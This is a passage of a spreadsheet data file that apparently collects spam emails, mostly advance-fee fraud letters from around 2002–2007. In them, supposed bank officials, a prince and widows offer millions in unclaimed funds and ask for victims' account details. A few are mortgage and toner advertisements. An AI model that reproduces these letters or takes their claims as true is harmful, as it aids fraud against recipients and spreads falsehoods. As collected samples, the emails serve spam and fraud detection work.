with proofs that I will\npresent to the bank when needed.\nWhen I receive a positive response and after proper discussion with you, i\nwill furnish you all relevant information that will\nfacilitate the release of the Funds to you. An Application will have to be\nfiled to the Bank for processing of the release of\nthe funds into your nominated bank account.\n\nI wait to hear from you.\nBarrister Barnett Scott.\nAlternative E-mail: barnett_scott@web2mail.com\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>2182</t>
  </si>
  <si>
    <t>To: R@S\nFrom: GET BACK TO ME IMMEDIATELY &lt;momoh1111@yahoo.co.uk&gt;\nDate: Wed, 07 Jun 2006 17:38:17 +0400</t>
  </si>
  <si>
    <t>Wed, 07 Jun 2006 17:38:17 +0400</t>
  </si>
  <si>
    <t>GET BACK TO ME IMMEDIATELY &lt;momoh1111@yahoo.co.uk&gt;</t>
  </si>
  <si>
    <t>Pls Read From Branch manager,National Bank of Dubai</t>
  </si>
  <si>
    <t xml:space="preserve">Hello My Dear,\n \nI got your contact through Internet searching and browsing and I want \nto establish a business relationship with you.\n \nI am Mr Momohh  Ngogbee, the Branch manager,National Bank of Dubai,Umm\nAl Quwain Branch,DUBAI,(UNITED ARAB EMIRATES),married with four\nchildren.\n \nI am writing this letter to ask for your support and co-operation to\ncarry out this business opportunity in my department.\n \nOn June 6, 1999,an Oil consultant/contractor with Dubai Petroleum\nCorporation, MR DAVID AMEERALY, made a numbered time(fixed)deposit for\ntwelve calendar months,Valued at US$16,500, 000.00 (sixteen Million \nFive Hundred Thousand Dollars) in my branch. upon maturity I sent a routine notification to his forwarding address but got no reply.\n \n \nAfter a month,we sent a reminder and finally we discovered from his\ncontract employers,the Dubai Petroleum Corporation that MR DAVID\nAMEERALY, died in the plane crash On October 31,1999,(an Egyptian\nBoeing767Flight 990) with other passengers on board as you can confirm\nit yourself via the website\nbelow:[URL]http://www.cbsnews.com[/URL]\nOn further investigation,I found out that he died without making a WILL\nand attempts to trace his next of kin were fruitless .\n \nI therefore made further investigation and discovered that MR DAVID\nAMEERALY,did not declare any next of kin or relations in all his\nofficial documents,including his bank deposit paperwork in my bank.\n \nThis sum of US$16,500, 000.00 and the interest is being rolled over \nwith the principal sum at the end of each year.No one will ever come forward to claim it and according to UNITED ARAB EMIRATES LAW,at the expiration of(Ten) years,the money will revert to the ownership of the UNITED ARAB EMIRATES Government if nobody applies to claim the fund.\n \nMy proposal is that I will like you to stand as the next of kin to MR\nDAVID AMEERALY, so that the fruit of this old man labour will not get\ninto the hands of some corrupt Government officials.This is simple, I\nwill like you to provide immediately your full name and address so that\nI can forward to you the contact of our bank Attorney for preparing the\nnecessary documents and affidavits which will put you in place as the\nnext of kin.\n \nAny bank account in any part of the world,which you will provide,will\nthen facilitate the transfer of this money to you as the\nbeneficiary/next of kin.\n \nThe money will be paid into your account for us to share in ratio of\n50% for me and 40% for you and 10 % will be set aside for expenses in\ncured during the business.There is no risk at all.\n \nThe paperwork for this transaction will be done by the attorney and my\nposition as the Branch Manager guarantees the successful execution of\nthis transaction.If you are interested,please reply immediately and upon your responses,I shall provide you with more details and relevant documents that will help you understand the transaction.\n \nPlease observe utmost confidentiality and be rest assured that this\ntransaction would be most profitable for both of us because I shall\nrequire your assistance to invest my share in your country.\n \nPlease upon the receipt of this mail message,send to me the following\nbelow to enable me start the processing of the transfer,\n\nmomoh3333@yahoo.co.uk\n\nmomoh4444@yahoo.co.uk\n\n1.Your Full Name\n2.Your House Address.\n3.Your Phone Number and Fax,\n\nThank You And God Bless You.\n\nSincerely,\nMr Momohh  Ngogbee  \n\n\n  </t>
  </si>
  <si>
    <t>http://www.cbsnews.com</t>
  </si>
  <si>
    <t>2184</t>
  </si>
  <si>
    <t>To: nan\nFrom: abu topia &lt;abu_topia004@hotmail.fr&gt;\nDate: Wed, 07 Jun 2006 15:15:23 +0000</t>
  </si>
  <si>
    <t>Wed, 07 Jun 2006 15:15:23 +0000</t>
  </si>
  <si>
    <t>abu topia &lt;abu_topia004@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>DR .ABU TOPIA</t>
  </si>
  <si>
    <t>Dear,\n\nI am the head of Accounts and Audit Department of Bank of Africa,\nOuagadougou . I decided to contact you after a careful thought that you may \nbe capable of handling this business transaction which i explained below;\n\nIn my department we discovered an abandoned sum of $10.5m US dollars (Ten \nmillion, five hundred thousand US dollars). In an account that belongs to \none of our foreign customer who died along with his entire family in 1998 in \na plane crash. Since we got information about his death, we have been \nexpecting his next of kin to come over and claim his money because we cannot \nrelease it unless somebody applies for it as next of kin or relation to the \ndeceased as indicated in our banking guidelines but unfortunately we learnt \nthat his supposed next of kin(his son and wife) died alongside with him at \nthe plane crash leaving nobody behind for the claim .\n\nIt is therefore upon this discovery that I and other officials in my \ndepartment now decided to make this business proposal to you and release the \nmoney to you as the next of kin (We want to present you as his busines \nasociate )to the deceased for safety and subsequent disbursement since \nnobody is coming for it and we don't want this money to go into the Bank \ntreasury as unclaimed Bill.\n\nThe Banking law and guideline here stipulates that if such money remained \nUnclaimed after seven years, the money will be transferred into the Bank \ntreasury as unclaimed fund. The request of foreigner as next of kin in this \nbusiness is occasioned by the fact that the customer was a foreigner and a \nBurkinabe cannot stand as next of kin to a foreigner .We agree that 30% of \nthis money will be for you as foreign partner, in respect to the provision \nof a foreign account, 10 % will be set aside for expenses incurred during \nthe business and 60% would be for me and my colleagues.\n\nThere after I and my colleagues will visit your country for disbursement \naccording to the percentages indicated. Therefore to enable the immediate \ntransfer of this fund to your account as arranged,you must apply first to \nthe bank as next of kin of the deceased customer. Upon receipt of your \nreply, I will send to you by fax or email the text of the application. I \nwill not fail to bring to your notice that this transaction is hitch free \nand that you should not entertain any atom of fear as all required \narrangements have been made for the transfer.\n\nI expect that you contact me immediately as soon as you receive this letter.\nHoping to hear from you immediately.\n\nYours faithfully,\nDR .ABU TOPIA\n\n_________________________________________________________________\nRetrouvez tout en un clin d'oeil avec la barre d'outil MSN Search ! \n[URL]http://desktop.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>2181</t>
  </si>
  <si>
    <t>To: R@S\nFrom: "Martin Goudalé &lt;martin9cc@walla.com&gt;, "@si.UM\nDate: Wed, 07 Jun 2006 13:32:20 +0000</t>
  </si>
  <si>
    <t>Wed, 07 Jun 2006 13:32:20 +0000</t>
  </si>
  <si>
    <t>"Martin Goudalé &lt;martin9cc@walla.com&gt;, "@si.UM</t>
  </si>
  <si>
    <t>Re: Greeting From Martin,</t>
  </si>
  <si>
    <t xml:space="preserve">Greeting,\n\nSir,\n\nI am contacting you believing you are a honest and trustworthy person.I believe you will not betray the confidence I am willing to repose in you, for me to have contacted you even though we've not met before.\n\nMy name is Martin Goudalé,the only son of late Mr.Hassan Goudalé, who was the chairman /President/CEO,Cacao-Cafe &amp; Agro-Alimentary industries plc.SCAFECAO)"Bouake" and ex-owner of Polyclinic LA-MADONNE, of the Republic of Cote d'Ivoire.\n\nYou can find the story on this\nwebsite:[URL]http://news.bbc.co.uk[/URL]\n\nOn 19th of September 2002,a group of so called rebels took over the city of Bouake to over-throw the Government of Mr.Laurent Gbagbo the President of Cote d'Ivoire. On the 20th day morning at about 4:18am some fractions of the same group of rebels break into our house and killed our security guard and pass-through the gate entrance to the main building and took my father away to an un-known destination.\n\nAfter about four hours later we found him (my father) at the road side, by then he had been totally beaten and was bleeding to death lying in the pool of his own blood. From there, we rushed him to a near by hospital and hours later he sent for my mother. So he told her that he can not make it from the doctors diagnosis, he also told her that it was because he (my father) was not from the northern part of the country that he has been treated this way and also being a political activist. And again he said he is suspecting some of his business partners for conspiracy and this sort of brutality. He also told my mother that he deposited a huge amount of money i.e US$ 10.5million dollars(Ten million five hundred thousand us dollars only)in a Finance House and also told her where he kept the whole documents concerning this deposit that is made for investment purpose in the western world.\n\nThat same day, he (my father) gave up the ghost. Then with the help of the French soldiers, we escaped to Senegal, where we are now. I am now contacting you believing you are honest and trustworthy to help us to receive the money in your account for investment, I and my mother has decided in compensating you 20%of the total amount for your assistance .\n\nPlease do take your time to go through the mail and get back to us, so that I will simply introduce to the Finance House where the fund are being kept now for onward transfer.\n\nI am waiting for your response.\nThanks and God bless.\nMartin Goudalé.\nmartin9aa@hotmail.com\n  </t>
  </si>
  <si>
    <t>2180</t>
  </si>
  <si>
    <t>To: nan\nFrom: idris ali &lt;dr_idris89@hotmail.fr&gt;\nDate: Wed, 07 Jun 2006 05:46:22 +0000</t>
  </si>
  <si>
    <t>Wed, 07 Jun 2006 05:46:22 +0000</t>
  </si>
  <si>
    <t>idris ali &lt;dr_idris89@hotmail.fr&gt;</t>
  </si>
  <si>
    <t>URGENT REPLY PLEASE.</t>
  </si>
  <si>
    <t>Dear Friend,\n\nAttention Please.\n\n\nSorry to disturb you. I am Dr Idris Ali, the Director in charge of Auditing \nand Accounting section of AFRICAN DEVELOPMENT BANK (A.D.B) Ouagadougou \nBurkina-faso West Africa. With due respect and regard. I have decided to \ncontact you on a business transaction that will be very beneficial to both \nof us at the end of the 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7.5M (Seven Million,Five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30% of the \ntotal sum as gratification, while 10% will be set aside to take care of \nexpenses that may arise during the time of transfer and also telephone and \ninternet bills, while 60% will be for me and my coleagues. Please, you have \nbeen adviced to keep "Top Secret" as I am still in service and intend to \nretire from service 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Dr Idris Ali.\n\n_________________________________________________________________\nWindows Live Mail : dcouvrez et testez la version bta ! \n[URL]http://www.ideas.live.com[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>http://www.ideas.live.com</t>
  </si>
  <si>
    <t>2177</t>
  </si>
  <si>
    <t>To: nan\nFrom: amiri babo &lt;amiri_babo008@hotmail.com&gt;\nDate: Wed, 07 Jun 2006 01:24:05 +0000</t>
  </si>
  <si>
    <t>Wed, 07 Jun 2006 01:24:05 +0000</t>
  </si>
  <si>
    <t>amiri babo &lt;amiri_babo008@hotmail.com&gt;</t>
  </si>
  <si>
    <t>URGENT AND CONFIDENTIAL</t>
  </si>
  <si>
    <t>FROM THE DESK OF.. DR AMIRI BABO\nBILL AND EXCHANGE MANAGER\nFOREIGN REMITTANCE DEPT.\nBANK  OF AFRICA(B.O.A)\nOUAGADOUGOU, BURKINA FASO\n\n\n\nDear Friend,\n\nI am the manager of bill and exchange at the foreign remittance department \nBANK\nOF AFRICA .\n\nIn my department we discovered an abandoned sum of U.S$25M US dollars \n(Twenty five Million  US dollars) in an account that belongs to one of our \nforeign customer who died along with his entire family in November 2002 in a \nplane crash.\n\nSince we got information about his death, we have been expecting his next if \nkin to come over and claim his money because we cannot release it unless \nsomebody applies for it as next of kin or relation to the deceased as \nindicated in our banking guidlines and laws but unfortunately we learnt that \nall his supposed next of kin or relation died alongside with him at the \nplane crash leaving\nnobody behind for the claim.\n\nIt is therefore upon this discovery that I now decided to make this business \nproposal to you so that the money will be released  to you as the next of \nkin or relation to the deceased for safety and subsequent disbursement since \nnobody is coming for it and we don't want this money to go into the bank \ntreasury as unclaimed bill.\n\nThe banking law and guidline here stipulates that if such money remained \nunclaimed after four years, the money will be transfered into the bank \ntreasury as unclaimed bill. The request of foreigner as next of kin in this \nbusiness is occassioned by the fact that the customer was a foreigner and a \nBurkinabe cannot stand as next of kin to a foreigner.\n\nI  propose  that 30% of this money will be for you as my  foreign partner, \nin respect to the provision of a foreign account, 10% will be set aside for \nexpenses incured during the business and 60% would be for me. Thereafter I \nwill visit your country for disbursement according to the percentages \nindicated.\n\nTherefore, to enable the immediate transfer of this fund to you as arranged, \nyou must apply first to the bank as relation or next of kin of the deceased \nindicating your bank name, your bank account number, your  private telephone \nand fax number for easy and effective communication and  location wherein \nthe money will be remitted.\n\nUpon receipt of your reply, I will send to you by e-mail a  text of the \napplication which you'll fill in and send to the bank's email address.. I \nwill not fail to bring to your notice that this transaction is hitch-free \nand that you should not entertain any atom of fear as all required \narrangements have been made for the transfer.\n\nYou should contact me immediately as soon as you receive this letter for \nfurther clearifications.\n\nYours faithfully,\n. DR AMIRI BABO\n\n_________________________________________________________________\nMSN Messenger : discutez en direct avec vos amis ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>To: R@S\nFrom: abdullah_andani@z6.com\nDate: Wed, 07 Jan 2004 15:11:07 +0400</t>
  </si>
  <si>
    <t>Wed, 07 Jan 2004 15:11:07 +0400</t>
  </si>
  <si>
    <t>abdullah_andani@z6.com</t>
  </si>
  <si>
    <t>FROM PRINCE ABDULLAH ANDANI</t>
  </si>
  <si>
    <t>\nGood Day my dear friend, \n\nI wish to request for your assistance in a financial Transaction, I decided to contact you, based on a certain issue that is of paramount importance to me.\n\nBut most importantly, I want you to show your credibility promise that you will be honest and trustworthy to me during my relationship with you, I am, until recently, a first year medical student at the University of Ghana,West Africa. \n\non the 27th of November 2002, in my home town YENDI CAPITAL DAGBON, NORTHERN REGION OF GHANA, some unknown mub attacked and brutal murdering in my family home with the killing of both uncles and aunts including my sister and brothers most expecially my father who was the key target, king or"lion" of Dagbon,Ya-Naa, YAKUBU ANDANI II .WELL YOU CAN FIND OUT BY YOURSELF THROUGH([URL]www.bbcafrica.com[/URL] search event on the(regicide in dagbon region of GHANA) . Fortunately for me, I was in school when the attack took place.\n\n I equally lost my only sister to the"ABUDU MUBS".When I got home for the remains of my parents,I discovered a document indicating that my late father had deposited $17.7M United States Dollars (Seventeen Million Seven hundred thousand USdollars) in a private security firm in JOHANNESBURG. This money, according to the document, was meant for the building of an ultra modern hospital for me by my late father, when I complete my studies.\n\nUpon the discovery of this document , I left GHANA in trace of the private security firm, and the safer of my life to make claims for the mentioned money as the only surviving next of kin to my father. But deliberately, I have decided to keep all my uncles and Aunts out of the issue as none of them will be happy to know I am in possession of such money and decided to invest it with you in your country. \n\nI have succeeded in making the people at the security company to believe that I am the next of Kin and all the documents related to it are now with me. \n\nI do not know what to do with it but I have decided to contact you to seek your assistance in helping me to take it out to your country or through your account and help me to come to your country to continue my education, so that you will help me to get the money invested until such a time that I will be ready to be in need of it. I am really desperate as I am left alone now in the world. Most importantly, I seriously appeal that you maintain high level of secrecy and confidentiality with the whole transaction.\n\nThanks and may Allah bless and guide you. more details awaits your urgent response. \n\nPRINCE ABDULAH RAHMAN ANDANI: NB: I HAVE THE DEPOSIT DOCUMENTS IN MY POSSESSION THAT WAS ISSUED TO MY LATE FATHER BY THE SECURITY FIRM. IF YOU NEED TO HAVE A LOOK AT THEM, PLEASE DO REPLY AS URGENT, FOR ME TO SEND THEM DOWN TO YOU THROUGH YOUR EMAIL ADDRESS, AND ALWAYS WRITE ME THROUGH MY PRIVATE MAIL BOX:abdulah77@netscape.net, please, use only this telephone number +88-216-2166-85-88, and email address for some security reasons. \n\nThanking you in advance for your anticipated kind assistance.\n\nregards to you and your entire family members.\n\nPrince. Abdullah Rahman Andani.\n+88-216-2166-85-88\n\nNOTE: \nON YOUR INABILITY TO HANDLE THIS TRANSACTION, RESPOND TO ME IMMEDIATELY SO THAT I MAY CONTACT SOMEONE ELSE. \n\n\n\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>www.bbcafrica.com</t>
  </si>
  <si>
    <t>530</t>
  </si>
  <si>
    <t>To: patrickatike2@fsmail.net\nFrom: patrick atike &lt;patrickatike2@fsmail.net&gt;\nDate: Wed, 07 Jan 2004 12:51:41 +0100</t>
  </si>
  <si>
    <t>Wed, 07 Jan 2004 12:51:41 +0100</t>
  </si>
  <si>
    <t>patrick atike &lt;patrickatike2@fsmail.net&gt;</t>
  </si>
  <si>
    <t>patrickatike2@fsmail.net</t>
  </si>
  <si>
    <t>URGENT PARTNERSHIP!</t>
  </si>
  <si>
    <t>ATTN: STRICTLY FOR THE PRESIDENT.\n\nREQUEST FOR BUSINESS PARTNERSHIP\nI am PATRICK ATIKE Director General,Federal Ministry of\nAgriculture.My position is very sensitive.I am married with\nchildren and hold degrees in Public Administration and\nBusiness Studies. I am due for retirement any moment from\nnow, after many years in service.\nREASONS FOR CONTACTING YOU\nI require urgently your unreserved assistance in allowing\nme to use your company/position to transfer fund to your\ncountry. The purpose of transfer is to take care of my\nretirement by investing in a viable business you might deem\nfit advise and to purchase a residential accommodation.\nNATURE OF BUSINESS AND SOURCE OF FUND FOR TRANSFER\nSince the inception of the present government, series of\ncontracts have been awarded by the Federal Ministry of\nAgriculture based on supplies (Heavy Equipment to various\nLocal Government Areas.) amounting to several Millions of\nU. S. Dollars.The sum of Fifteen Million Five Hundred\nThousand ($15.5 Million) was over invoiced and the\ncontractors who made the supply have since been paid.\nPresently, I have arrange for the money to be kept in Coded\nBank Account with the Central Bank of Nigeria (CBN) until I\nam able to source for a reliable expatriate partners whom I\ncan present as the rightful beneficiary of the fund.You\nwill take the status of the contractor who supplied the\nEquipment and I will arrange the supporting documents for\nthe Transfer.\nMODE OF SHARING\n25% will go to you for making available to us a company\ninfomation,giving me your unreserved assistance and keeping\nstrictly the rules of this transaction until transfer of\nthe fund is effected. 5% is for any contingencies and all\nmiscellaneousexpenses incurred during the course of the\ntransaction, procurement of vital documents, tipsand all\nexpenses including phone/fax bills, hotelbills, taxes and\nbank charges must be reconciled upon confirmation of the\npayment by Central Bank of Nigeria (CBN) 70% will be shared\nbetween me and a few colleagues of mine whose help will be\nhighly needed throughout this period in question.\n\nOTHER PERTINENT DETAILS\n\nEverything about this transaction is real. The money is\nclean, after putting in so many years in service it is only\nnormal for me to take good measures to secure my period in\nretirement. I have put in resources and time to bring this\ntransaction to this level which means that it represents a\nlot to me,and hopefully with help from you, in just a\nmatter of weeks, it shall come to mean a lot to you too as\nwe meet in your country to celebrate the closing of the\ndeal. If you are interested in this transaction, please\ncontact me through my e-mail,and also furnish me with your\ndirect phone, fax and e-mail lines both at your residence\nand your office for me to contact you.\nThanking you for your kind understanding and co-operation.\nYours sincerely,\n\nPATRICK ATIKE\nFreeserve AnyTime - HALF PRICE for the first 3 months - Save £7.50 a month \n[URL]www.freeserve.com[/URL]</t>
  </si>
  <si>
    <t>528</t>
  </si>
  <si>
    <t>To: nan\nFrom: kolapo omidire &lt;kolapoomidire2@webmail.co.za&gt;\nDate: Wed, 07 Jan 2004 12:10:12 +0200</t>
  </si>
  <si>
    <t>Wed, 07 Jan 2004 12:10:12 +0200</t>
  </si>
  <si>
    <t>kolapo omidire &lt;kolapoomidire2@webmail.co.za&gt;</t>
  </si>
  <si>
    <t>trust</t>
  </si>
  <si>
    <t>\n     PLEASE REPLY TO  k_omidire@yahoo.com\n\nGood day and a happy and prosperous new year !\n\nI am Kolapo Omidire, company secretary and manager,\ninternal and external services of COMMERCIAL BANK OF\nAFRICA. I am writing in respect of a foreign customer of my\nbank who perished with his entire family \n(His wife and only son) in a plane crash (Korean Air Line\n801) on August 6, 1997.\n\nSince the demise of this customer of ours , the bank\nmanagement of COMMERCIAL BANK OF AFRICA has made valuable\nefforts to get in touch with any of the late customer's\nNext-of-Kin or relative anywhere in the world but \nunfortunately, all our efforts did not yield any positive\nresults as no one has come to claim his funds to the tune\nof Twenty one million, five hundred thousand united states\ndollars(USD21.5m) which has been with my bank all these\nwhile.\n\nRecently, the Federal Government of Nigeria directed that\nall funds not claimed (which has exceeded the stipulated\nbanking period of seven years for such money) should be\nconfiscated to the Federal Government Treasury Because\nthe banking ethics here does not allow such money to stay\nmore than seven years.This means that this money will be\nrecalled to the federal Government treasury as unclaimed\nafter this period, precisely within this first quater \nof this year.\n\nOn this note, the chairman of the board of directors of the\nbank recently called me and told me in confidence and trust\nto source for a reliable foreigner who would stand as our\nforeign customer's next of kin. We (myself\nand the chairman) have reasoned that if we fail to collect\nthis money the Nigerian government will confisticate it and\nsomeone else will end up looting it. Thats's why we have\ndecided to contact you, hoping you will prove to\nbe a reliable foreigner to stand as next of Kin to the\ndeceased customer to claim the total fund from his account\nwith the bank so that the proceeds of his account can be\npaid to you.\n\nBe assured that this transaction is risk free and we will\ndo all possible to give it the legal and legitimate backing\nit requirs so that both parties will be protected from\nbreach of the law both locally and internationally.\n\nUpon receipt of your response, I shall furnish you with the\nnext step to take on how you shall prosecute this claim to\nyour account. The entire transaction should be completed\nwithin 10 official working days from\nthe day the bank receives your initial application.\n\nWhen you receive this letter, Kindly send me an e-mail\nsignifying Your acceptance or otherwise, include your\nprivate Telephone numbers for more explanation\nand confidential communication.\n\nWaiting to hear from you soon,\nBest Regards,\nK. Omidire.   PLEASE REPLY TO  k_omidire@yahoo.com\n___________________________________________\n Look Good, Feel Good [URL]www.healthiest.co.za[/URL]\n\n\n</t>
  </si>
  <si>
    <t>2906</t>
  </si>
  <si>
    <t>To: nan\nFrom: Madam Aicha Ahmed &lt;ai_hmed8@hotmail.com&gt;\nDate: Wed, 07 Feb 2007 10:56:15 +0000</t>
  </si>
  <si>
    <t>Wed, 07 Feb 2007 10:56:15 +0000</t>
  </si>
  <si>
    <t>Madam Aicha Ahmed &lt;ai_hmed8@hotmail.com&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Mrs Aicha Ahmed, TREAT VERY URGENT AND CONFIDENTIAL. CALL ME 0022676743842. </t>
  </si>
  <si>
    <t>My Dear,\n\nI am Mrs Aicha Ahmed, the manager of bill and exchange at the foreign \nremittance department Bank Of Africa.\n\nIn my department we discoveredan abandoned sum of US$14.5M (fourteen million \nfive hundred thousand US dollars) in an account that belongs to one of our \nforeign customer who died along with his family in the 2003 in a plane \ncrash.\n\nSince we got information about his death, we have been expecting his next of \nkin to come over and claim his money because we cannot release it unless \nsome body applies for it as next of kin or relation to the deceased as \nindicated in our banking guide lines and laws but unfortunately we learnt\nthat all his supposed next of kin or relation died alongside with him at the \nplane crash leaving nobody behindfor the claim.\n\nIt is therefore upon this discovery that I now decided to make this business \nproposal to you and release the money to you as the next of kin or relation \nto the deceased for safety and subsequent disbursement since nobody is \ncoming for it and we don't want this money to go into the bank\ntreasury as unclaimed bill.\n\nThe banking law and guidelines here stipulates that if such money remained \nunclaimed after four years, the money will be transferred into the bank \ntreasury as unclaimed fund.\n\nThe request of foreigner as next of kin in this business is occasioned by \nthe fact that the customer was a foreigner and a Burkina cannot stand as \nnext of kin to a foreigner.\n\nI agree that 45% of this money will be for you as respect to the provision \nof a foreign account , 5% will be set aside for expenses incurred during the \nbusiness and 50% be for me.\n\nThereafter, I will visit your country fordisbursement according to the \npercentage indicated. Therefore, to enable the immediate transfer of this \nfund to you as arranged, you must apply\nfirst to the bank as relation or next of kin of the deceased indicating your \nbank name, your bank account number, your private telephone and fax number \nfor easy and effective communication and location where the money will be \ntransfer.\n\nUpon receipt of your reply, I will send to you by fax or email the text of \nthe application. I will not fail to bring to your notice that this \ntransaction is hitch-free and that you should not entertain any atom of fear \nas all required arrangements have been made for the transfer.\n\nYou should contact me immediately as soon as you receive this mail,Trusting \nto hear from you immediately.\n\nYours faithfully.\n\nMrs Aicha Ahmed.\n\nN/B: CALL ME AS SOON AS YOU RECEIVE THIS MAIL OR\nEMAIL Me.\nTEL:0022676743842.\n\n_________________________________________________________________\nMSN Messenger : discutez en direct avec vos amis ! \n[URL]http://www.msn.fr[/URL]\n\n\n\n</t>
  </si>
  <si>
    <t>5758</t>
  </si>
  <si>
    <t>To: &lt;C:`Bulk.AdzMTGnewmtgforyou.txt@dogma.slashnull.org&gt;\nFrom: "lucy" &lt;rob4433@iwon.com&gt;\nDate: Wed, 07 Aug 2002 11:35:40 -1600</t>
  </si>
  <si>
    <t>Wed, 07 Aug 2002 11:35:40 -1600</t>
  </si>
  <si>
    <t>"lucy" &lt;rob4433@iwon.com&gt;</t>
  </si>
  <si>
    <t>&lt;C:`Bulk.AdzMTGnewmtgforyou.txt@dogma.slashnull.org&gt;</t>
  </si>
  <si>
    <t>Tired Of Your High Mortgage Rate - REFINANCE TODAY.....</t>
  </si>
  <si>
    <t>Dear Homeowner, \n\nInterest Rates are at their lowest point in 40 years! We help you find the \nbest rate for your situation by matching your needs with hundreds of \nlenders!\n\nHome Improvement, Refinance, Second Mortgage, \nHome Equity Loans, and much, much more!\n \nYou're eligible even with less than perfect credit!\n \nThis service is 100% FREE to home owners and new home buyers \nwithout any obligation. \n\nWhere others say NO, we say YES!!!\n\n[URL]http://www282.fastwebsnet.com[/URL]\n \nTake just 2 minutes to complete the following form.\nThere is no obligation, all information is kept strictly\nconfidential, and you must be at least 18 years of age.  \nService is available within the United States only.\nThis service is fast and free. \n\n[URL]http://www282.fastwebsnet.com[/URL]\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\nTo opt out:\n\n[URL]http://www282.fastwebsnet.com[/URL]</t>
  </si>
  <si>
    <t>http://www282.fastwebsnet.com http://www282.fastwebsnet.com http://www282.fastwebsnet.com</t>
  </si>
  <si>
    <t>5757</t>
  </si>
  <si>
    <t>To: &lt;mpb@rocketsoftware.com&gt;\nFrom: "Margaret" &lt;ca0muft7q66312@yahoo.com&gt;\nDate: Wed, 07 Aug 2002 06:13:21 -1900</t>
  </si>
  <si>
    <t>Wed, 07 Aug 2002 06:13:21 -1900</t>
  </si>
  <si>
    <t>"Margaret" &lt;ca0muft7q66312@yahoo.com&gt;</t>
  </si>
  <si>
    <t>&lt;mpb@rocketsoftware.com&gt;</t>
  </si>
  <si>
    <t>Toners and inkjet cartridges for less....          CTLOSJV</t>
  </si>
  <si>
    <t>Tremendous Savings on Toners,  Inkjets, FAX, and Thermal Replenishables!! Toners 2 Go is your secret weapon to lowering your cost for High Quality, Low-Cost printer supplies!  We have been in the printer replenishables business since 1992, and pride ourselves on rapid response and outstanding customer service.  What we sell are 100% compatible replacements for Epson, Canon, Hewlett Packard, Xerox, Okidata, Brother, and Lexmark; products that meet and often exceed original manufacturer's specifications. Check out these prices!         Epson Stylus Color inkjet cartridge (SO20108):     Epson's Price: $27.99     Toners2Go price: $9.95!        HP LaserJet 4 Toner Cartridge (92298A):           = ; HP's Price: $88.99            Toners2Go   price: $41.75!   Come visit us on the web to check out our hundreds of similar bargains at Toners 2 Go!      request to be removed by clicking HERE mtarrant [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>5739</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: &lt;ronald0564c62@yahoo.com&gt;\nDate: Wed, 07 Aug 0102 16:11:22 +1000</t>
  </si>
  <si>
    <t>Wed, 07 Aug 0102 16:11:22 +1000</t>
  </si>
  <si>
    <t>&lt;ronald0564c62@yahoo.com&gt;</t>
  </si>
  <si>
    <t>New Internet Service Provider</t>
  </si>
  <si>
    <t>Hello:\n\nAre you satisfied with your ISP? Do you have 5 email addresses for you and your family? Do you have 5 MB of personal webspace? How truly unlimited is your access time?\n\nOur internet service provides you with all of that at a low monthly fee of just $14.95. You get 5 email addresses, 5MB of personal webspace and 350 hours of access time per month (virtually unlimited). That is more than most people will use, do the math.\n\nWe have local numbers for many areas.\nFor further information please email me at codjig@canada.com and place "Request Information in the subject line. \nIf you do not wish any more mailings please send a blank email to codjig@canada.com.\nRegards,\nSteve Murphy\n\n7977JrzS7-887RrsR4903rvQG5-779Sctl3539oIeJ0-966Grtz8l49\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>660</t>
  </si>
  <si>
    <t>To: monicamtf11@galmail.co.za\nFrom: monica martins &lt;monicamtf11@galmail.co.za&gt;\nDate: Wed, 07 Apr 2004 15:38:11 +0200</t>
  </si>
  <si>
    <t>Wed, 07 Apr 2004 15:38:11 +0200</t>
  </si>
  <si>
    <t>monica martins &lt;monicamtf11@galmail.co.za&gt;</t>
  </si>
  <si>
    <t>monicamtf11@galmail.co.za</t>
  </si>
  <si>
    <t>FROM  MONICA</t>
  </si>
  <si>
    <t>From: Mrs.Monica Martins \n23 Rivonia Road Sandton City\nJohannesburg South Africa\nTel+27-83-238-3440\n\nATTN: Sir, \n\nMy name is Mrs.Monica Martins, the wife of late Mr.Zulu\nMartins, of Zimbabwe. It might be a surprise to you where I\ngot your contact address I got it from the net.I am using\nthis opportunity to express my predicaments to you\nDuring the current crises against the farmers of Zimbabwe\nby the supporters of our President ROBERT MUGABE to claim\nall the white owned farms in our country, he \nordered all the white farmers to surrender their farms to\nhis party members and their followers. \nMy husband was one of the best farmers in the country and\nknowing that he did not support the president's political\nideology, the president's supporters invaded my husband's\nfarm, burnt down everything, shot him and as a result of\nthe wounds sustained, he became sick and died after two\ndays. And after his death I became a widow over night with\nmy only son (Frank Martins) and one daughter (Russ) decided\nto move out of Zimbabwe for the safety of our lives to\nSouth Africa. Before he died, he wrote his 'WILL' which\nreads:\n \n'MY BELOVEED SON (Frank) I WISH TO DRAW YOUR ATTENTION TO\nTHE SUM OF \nUS$20.7 MILLION U.S DOLLARS WHICH I DEPOSITED IN A BOX WITH\nA SECURITY COMPANY IN JOHANNESBURG (SOUTH-AFRICA) IN CASE\nOF MY ABSENCE ON EARTH CAUSED BY DEATH ONLY' \nyou should solicit for reliable foreign partner to assist\nyou to transfer this money out of SOUTH-AFRICA for the\nfamily care and investment purposes I deposited the money\nin your  name(Frank Martins)and it can be claimed by you\nwith the help of a foreign partner using the deposit\ncode.Your mother has all the documents.Take good care of\nyour mother and your sister.\n\n&gt;From the above you will understand that the lives and\nfuture of my family depends on this money as much as I will\nbe very grateful if you can assist us. We are now living in\nSouth-Africa as POLITICAL ASYLUM SEEKERS and the financial\nlaw of SOUTH-AFRICA do not allow an ASYLUM SEEKER any\nfinancial right to operate such huge amount of money .In\nview of this I cannot invest this money in South-Africa\nhence I am asking you to assist us transfer this money out\nof South-Africa for investment purposes. \n\n[1]. For your efforts I am prepared to offer you 30% of the\ntotal fund while 70% will be kept for my family and I for\ninvestments.Immediately we establish trust within our\nselves, I would go ahead to give you all the details you\nmight require to know about this fund.\n\nYOU CAN GIVE US A CALL ON +27-83-238-3440.YOU SEND YOUR\nRESPONSE TO (monica_mtf4@yahoo.co.uk \nATTACHED IS A PHOTOGRAPH OF THE CONSIGNMENT MY 